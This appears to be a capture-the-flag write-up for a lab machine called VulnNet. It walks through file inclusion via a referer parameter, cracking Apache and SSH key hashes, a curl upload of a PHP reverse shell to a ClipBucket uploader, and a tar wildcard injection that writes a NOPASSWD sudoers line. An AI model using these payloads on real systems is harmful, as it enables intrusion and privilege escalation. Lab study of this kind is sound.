# Tasks
1. user.txt
2. root.txt


# NMAP SCAN
```nmap
PORT   STATE SERVICE VERSION  
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)  
| ssh-hostkey:    
|   2048 ea:c9:e8:67:76:0a:3f:97:09:a7:d7:a6:63:ad:c1:2c (RSA)  
|   256 0f:c8:f6:d3:8e:4c:ea:67:47:68:84:dc:1c:2b:2e:34 (ECDSA)  
|_  256 05:53:99:fc:98:10:b5:c3:68:00:6c:29:41:da:a5:c9 (ED25519)  
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))  
|_http-title: VulnNet  
|_http-server-header: Apache/2.4.29 (Ubuntu)  
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

# Findings
## Web 
- No robots.txt
- Found possible subdomain in `index_7ed54732.js`
```js
return ''.concat(void 0 === e ? 'http://broadcast.vulnnet.thm' : e).concat('/', '?_alias=').concat(n, '&_callbackAlias=').concat(l, '&_lang=').concat(c)
```
- Found endpoint in `index_d8338055.js`
```js
  n.p = 'http://vulnnet.thm/index.php?referer=',
```
- Vector LFI?
`http://vulnnet.thm/index.php?referer=/etc/passwd`
- `/etc/passwd` is reflected in the DOM. We have file inclusion.
### Subdomain broadcast
- Uses basic authentication.
- No credentials so can't do much

# Foothold
- Unable to view access.log for apache2.
- Try to read .htpasswd from /var/www/html unsuccessful.
- Found .htpasswd in default path which is /etc/apache2/.htpassd
`developers:$apr1$ntOz2ERF$Sd6FT8YVTValWjL7bJv0P0`
- Hash is `Apache $apr1$`
`developer:9972761drmfsls`
- We can now login into the subdomain.

- Subdomain is photo,video upload server. Using clipbucket version 4.0
- The version is vulnerable to a lot of [exploits](https://www.exploit-db.com/exploits/44250)
- We can use this to upload a reverse shell
```txt
curl -F "file=@pfile.php" -F "plupload=1" -F "name=anyname.php"
"http://$HOST/actions/beats_uploader.php"
```
- We can navigate to `/files` to trigger it.
- We now have shell as www-data and there is only user server-management

# Privilege Escalation
- www-data has password for `sudo -l`
- Found DB credentials in `var/www/html/includes/dbconnect.php`
```php
 //Database Name  
       $DBNAME = 'VulnNet';  
       //Database Username  
       $DBUSER = 'admin';  
       //Database Password  
       $DBPASS = 'VulnNetAdminPass0990'
```
- But nothing interesting was found.
- Check /etc/crontab
`*/2   * * * *   root    /var/opt/backupsrv.sh`
- Found `ssh-backup.tar.gz` in `/var/backups`
- We can un-archive it for a private key.
- Private key is password protected, use ssh2john to crack.
`oneTWO3gOyac`
- We can SSH as user server-management.
- server-management has password for `sudo -l` both password does not work.
- Nothing interesting in linpeas.sh enumeration

# Writeup
This is my first time doing a wildcard injection so I had to refer to a write up.
```bash
echo 'echo "server-management ALL=(root) NOPASSWD: ALL" > /etc/sudoers' > demo.sh
echo "" > "--checkpoint-action=exec=sh demo.sh"
echo "" > --checkpoint=1
```
And we're root! I don't have explanation for this so I'll have to study it.
```bash
#!/bin/bash  
  
# Where to backup to.  
dest="/var/backups"  
  
# What to backup.    
cd /home/server-management/Documents  
backup_files="*"  
  
# Create archive filename.  
day=$(date +%A)  
hostname=$(hostname -s)  
archive_file="$hostname-$day.tgz"  
  
# Print start status message.  
echo "Backing up $backup_files to $dest/$archive_file"  
date  
echo  
  
# Backup the files using tar.  
tar czf $dest/$archive_file $backup_files  
  
# Print end status message.  
echo  
echo "Backup finished"  
date  
  
# Long listing of files in $dest to check file sizes.  
ls -lh $dest
```
I found this article explaining about [Wild Card Injection](https://materials.rangeforce.com/tutorial/2019/11/08/Linux-PrivEsc-Wildcard/)